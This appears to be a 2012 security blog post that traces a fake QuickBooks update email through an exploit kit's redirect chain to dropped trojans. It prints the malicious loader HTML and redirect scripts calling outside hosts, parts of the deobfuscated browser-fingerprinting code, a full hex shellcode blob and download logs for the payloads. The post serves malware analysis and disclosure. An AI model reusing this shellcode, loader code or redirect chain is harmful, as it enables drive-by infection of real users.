Saturday, September 1, 2012

What can Exploit Kit do & drop? Full story of spam to malwares

I am following the steps of infection of ONE spam mail which lead to a sophisticated exploit kit which dropped MANY malwares, during infection it was automatically detecting your browser and PC to find the best mess to drop/infect you beforehand.
The dropped malwares collection is at below pic:

↑ As you can see all is in the today's date, is fresh. Don't worry the sample is out there, grab them all.
This threat is so nasty so I think I need to blog it. Below is the report. 

I believe some of you received or seeing mail like this:
Date: Tue, 28 Aug 2012 11:04:30 -0400 From: "Intuit Payroll Services" Subject: QuickBooks Security Update You will not be able to access your Intuit QuickBooks without updated Intuit Security Tool (IST™) after 31th of August, 2012. You can update Intuit Security Tool here. After a successful download please run the setup for an automatic installation, then login to Intuit Quickbooks online to check that it is working properly. This email was sent from an auto-notification system that can't accept incoming email. Please don't reply to this message. You have received this business communication as part of our efforts to fulfill your request or service your account. You may receive this and other business communications from us even if you have opted out of marketing messages. Terms, conditions, pricing, features, and service options are subject to change. View our complete Terms of Service.
If you click the term and condition you will access the below link:
hxxp://babyu.onedaynet.co.kr/JHF0X3B/index.html
After accessing the url you will get the malicious index.html like below:
<html> <h1>WAIT PLEASE</h1> <h3>Loading...</h3> <script type="text/javascript" src="hXXp://66.242.140.34/LA5S92vH/js.js"></script> <script type="text/javascript" src="hXXp://freerobinfly.com/sS5N3rtK/js.js"></script> <script type="text/javascript" src=" hXXp://ftp.santoscortereal.com.br/wBWnt3vJ/js.js"></script> </html>
↑It is a not-good index.html, let's check in VirusTotal :
MD5:       5d323254ee15f460a6bd6f7262cd3c42 File size: 327 バイト ( 327 bytes ) File name: output.2145601.txt File type: HTML Tags: html Detection ratio: 18 / 42 Analysis date: 2012-08-31 12:47:34 UTC URL: [CLICK]
If you trace the three urls written in that HTML, it will lead you to the same javascript file. I traced it like this:
--00:27:31-- hXXp://66.242.140.34/LA5S92vH/js.js => `js.js' Connecting to 66.242.140.34:80... connected. HTTP request sent, awaiting response... 200 OK Length: 78 [application/x-javascript] 100%[====================================>] 78 --.--K/s 00:27:32 (2.72 MB/s) - `js.js' saved [78/78] --00:27:40-- hXXp://freerobinfly.com/sS5N3rtK/js.js => `js.js.1' Resolving freerobinfly.com... 74.208.242.135 Connecting to freerobinfly.com|74.208.242.135|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 78 [application/x-javascript] 100%[====================================>] 78 --.--K/s 00:27:41 (371.47 KB/s) - `js.js.1' saved [78/78] --00:27:47-- hXXp://ftp.santoscortereal.com.br/wBWnt3vJ/js.js => `js.js.2' Resolving ftp.santoscortereal.com.br... 200.98.197.17 Connecting to ftp.santoscortereal.com.br|200.98.197.17|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 78 [application/x-javascript] 100%[====================================>] 78 --.--K/s 00:27:48 (1.92 MB/s) - `js.js.2' saved [78/78]
Let's see what's inside of this js.js
document・location='hXXp://50.116.44.177/pxyk80ujzb03h.php?y=078eb263358008ea';
↑Another redirection. OK. This is no good too, let7s check in Virus Total again:
MD5: e2525763bdf95e9a33001fd231ee109e File size: 78 バイト ( 78 bytes ) File name: js.js File type: Text Detection ratio: 3 / 42 Analysis date: 2012-08-31 15:59:42 UTC ( 0 分 ago ) URL: [CLICK]
↑OK, at least three antivirus product is detected it. Let's grab it too and see the inside of it then ↓
--00:29:18-- http://50.116.44.177/pxyk80ujzb03h.php?y=078eb263358008ea => `pxyk80ujzb03h.php@y=078eb263358008ea' Connecting to 50.116.44.177:80... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/html] [ <=> ] 69,236 115.00K/s 00:29:20 (114.70 KB/s) - `pxyk80ujzb03h.php@y=078eb263358008ea' saved [69236]
And the inside is obfuscation code like this ↑This is definitely not good at all, let's check it in Virus Total first↓
MD5: 643e431692f6ce0eaf4bb4bdb1e0ed4a File size: 67.6 KB ( 69236 bytes ) File name: pxyk80ujzb03h.php@y=078eb263358008ea File type: HTML Detection ratio: 2 / 42 Analysis date: 2012-08-31 16:18:34 UTC ( 0 分 ago ) URL: [CLICK]
Oh, looks like I am the first who uploaded this sample. Well at least NOW at least we still have 2 antivirus product detected it. If you deobfuscated it right you will have below result, one is the below code:
document・write('<center>Waiting for redirect...</center>'); function end_redirect(){ window・location.href = 'hxxp://davidkellett.co.uk/updateflashplayer.exe';
And the other is a plugin detect in Javascript:
var PluginDetect = { version : "0.7.8", name : "PluginDetect", handler : function (c, b, a){ return function (){ c(b, a) <etc etc>。。。。。
It detected your OS:
c.OS = 100; if (b){ var d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod", 21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\\s*PC", 22.3, "" , 100]; for (f = d.length - 2; f >= 0; f = f - 2){ if (d[f] && new RegExp(d[f], "i").test(b)){ c.OS = d[f + 1]; break
It sensing your browser user agent for the right drops:
var c = this , a = navigator, e = "/", f, i = a.userAgent || "", g = a.vendor || "", b = a.platform || "", h = a.product || ""; c.initObj(c, ["$", c]); for (fin c.Plugins){ if (c.Plugins[f]){ c.initObj(c.Plugins[f], ["$", c, "$$", c.Plugins[f]], 1) }
Sensing the element to install messes to your browser:
c.head = (document.getElementsByTagName("head")[0] || document.getElementsByTagName( "body")[0] || document.body || null); c.isIE = (new Function("return " + e + "*@cc_on!@*" + e + "false"))(); c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) : null ; c.ActiveXEnabled = false; if (c.isIE){ var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM", "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper", "Scripting.Dictionary", "wmplayer.ocx"]; for (f = 0; f < j.length; f ++ ){ if (c.getAXO(j[f])){ c.ActiveXEnabled = true; break
And Checking which browser you have
c.isGecko = (/Gecko/i).test(h) && (/Gecko\s*\/\s*\d/i).test(i); c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i) ? RegExp.$1 : "0.9") : null; c.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i); c.verChrome = c.isChrome ? c.formatNum(RegExp.$1) : null; c.isSafari = ((/Apple/i).test(g) || (!g &&! c.isChrome)) && ( /Safari\s*\/\s*(\d[\d\.]*)/i).test(i); c.verSafari = c.isSafari && (/Version\s*\/\s*(\d[\d\.]*)/i).test(i) ? c.formatNum( RegExp.$1) : null; c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i); c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(i) || 1) ?
Very interesting to know that this code is considering to use Java against you:
DTK : { $ : 1, hasRun : 0, status : null, VERSIONS : [], version : "", HTML : null, Plugin2Status : null, classID : ["clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA", "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"], mimeType : [ "application/java-deployment-toolkit", "application/npruntime-scriptable-plugin;DeploymentToolkit"], disabled : function (){ : : : var m, s = "1,4,2,0", g = "JavaPlugin." + a[0] + "" + a[1] + "" + a[2] + "" + (a[3] > 0 ? ("_" + (a[3] < 10 ? "0" : "") + a[3]) : ""); for (h = 0; h < f.JavaVersions.length; h ++ ){ d = f.JavaVersions[h]; n = "JavaPlugin." + d[0] + "" + d[1]; b = d[0] + "." + d[1] + "."; for (l = d[2]; l >= 0; l -- ){ r = "JavaWebStart.isInstalled." + b + l + ".0"; if (e.compareNums(d[0] + "," + d[1] + "," + l + ",0", j) >= 0 &&! e.getAXO
Well, is sphisticated isn't it? The full code of deobfs are here ====>>> [CLICK] OK, let's get further. The deobfs code above also brings you the shellcode below:
41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81 e9 57 fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04 a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3 af 1c 0c ad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3 5c 1d 50 2b dd 7e a3 5e 08 2b dd 1b e1 61 69 d4 85 2b ed 1b f3 27 96 38 10 da 5c 20 e9 e3 25 2b f2 68 c3 d9 13 37 5d ce 76 a3 76 0c 2b f5 4e a3 24 63 a5 6e c4 d7 7c 0c 24 a3 f0 2b f5 a3 2c a3 2b ed 83 76 71 eb c3 7b 85 a3 40 08 a8 55 24 1b 5c 2b be c3 db a3 40 20 a3 df 42 2d 71 c0 b0 d7 d7 d7 ca d1 c0 28 28 28 28 70 78 42 68 40 d7 28 28 28 78 ab e8 31 78 7d a3 c4 a3 76 38 ab eb 2d d7 cb 40 47 46 28 28 40 5d 5a 44 45 7c d7 3e ab ec 20 a3 c0 c0 49 d7 d7 d7 c3 2a c3 5a a9 c4 2c 29 28 28 a5 74 0c 24 ef 2c 0c 5a 4d 4f 5b ef 6c 0c 2c 5e 5a 1b 1a ef 6c 0c 20 08 05 5b 08 7b 40 d0 28 28 28 d7 7e 24 a3 c0 1b e1 79 ef 6c 35 28 5f 58 4a 5c ef 6c 35 2d 06 4c 44 44 ee 6c 35 21 28 71 a2 e9 2c 18 a0 6c 35 2c 69 79 42 28 42 28 7b 7f 42 28 d7 7e 3c ad e8 5d 3e 42 28 7b d7 7e 2c 42 28 ab c3 24 7b d7 7e 2c ab eb 24 c3 2a c3 3b 6f a8 17 28 5d d2 6f a8 17 28 5d ec 42 28 42 d6 d7 7e 20 c0 b4 d6 d7 d7 a6 66 26 c4 b0 d6 a2 26 a1 47 29 95 1b e2 a2 73 33 ee 6e 51 1e 32 07 58 40 5c 5c 58 12 07 07 1d 18 06 19 19 1e 06 1c 1c 06 19 1f 1f 07 58 06 58 40 58 17 4e 15 18 19 1c 18 18 0e 4d 15 19 28 28 00
This will lead you to the downloading file from:
hxxp://50.116.44.177/p.php?f=01400&e=1
So we have two new download URL that we can assumed is payload, let's check, The first URL is:
--00:34:48-- hxxp://davidkellett.co.uk/updateflashplayer.exe => `updateflashplayer.exe' Resolving davidkellett.co.uk... 209.235.144.9 Connecting to davidkellett.co.uk|209.235.144.9|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 371,112 (362K) [application/x-msdownload] 100%[====================================>] 371,112 72.82K/s ETA 00:00 00:34:55 (52.38 KB/s) - `updateflashplayer.exe' saved [371112/371112]
In virus Total the score is 11/42:
MD5: 4c22e00d38a44b810f6103ec6837b137 File size: 362.4 KB ( 371112 bytes ) File name: updateflashplayer.exe File type: Win32 EXE Tags: peexe Detection ratio:11 / 42 Analysis date: 2012-08-31 15:29:23 UTC ( 7 分 ago ) URL: [CLICK]
↑It looks like Zbot. I am not expert w/ naming buff, Anyway malware details I wrote in Virus Total Page.. The other drops goes to:
--00:36:20-- http://50.116.44.177/p.php?f=01400 => `p.php@f=01400' Connecting to 50.116.44.177:80... connected. HTTP request sent, awaiting response... 200 OK Length: 177,576 (173K) [application/x-msdownload] 100%[===================================> ] 177,576 147.57K/s 00:36:22 (147.13 KB/s) - `p.php@f=01400' saved [177576/177576]
This is also a bad stuff, in Virus Total only 1(one) vendor detected it.
MD5: 096a79434392461517907c6f62b27cd1 File size: 173.4 KB ( 177576 bytes ) File name: sample File type: Win32 EXE Tags: peexe Detection ratio:1 / 42 Analysis date: 2012-08-31 15:37:57 UTC ( 1 時間, 23 分 ago ) URL: [URL]
↑Is a Trojan, runs as daemon/processes, reads keyboard & screen, worse of all is faking Microsoft binary with the yesterday compilation day.

2 comments:

  1. Nice "FAST" work! and its not even 9/1 here yet so this is still in my future :)

    ReplyDelete
  2. Thank's RazorEQX, I wrote as fast as I can.. Analyzing and just wrote it in blog.. sorry for the mistype .. no time to correct the typo...
    Please add comment if you have tought of what I cannot detect yet, like what kind of Exploit Kit is it?

    ReplyDelete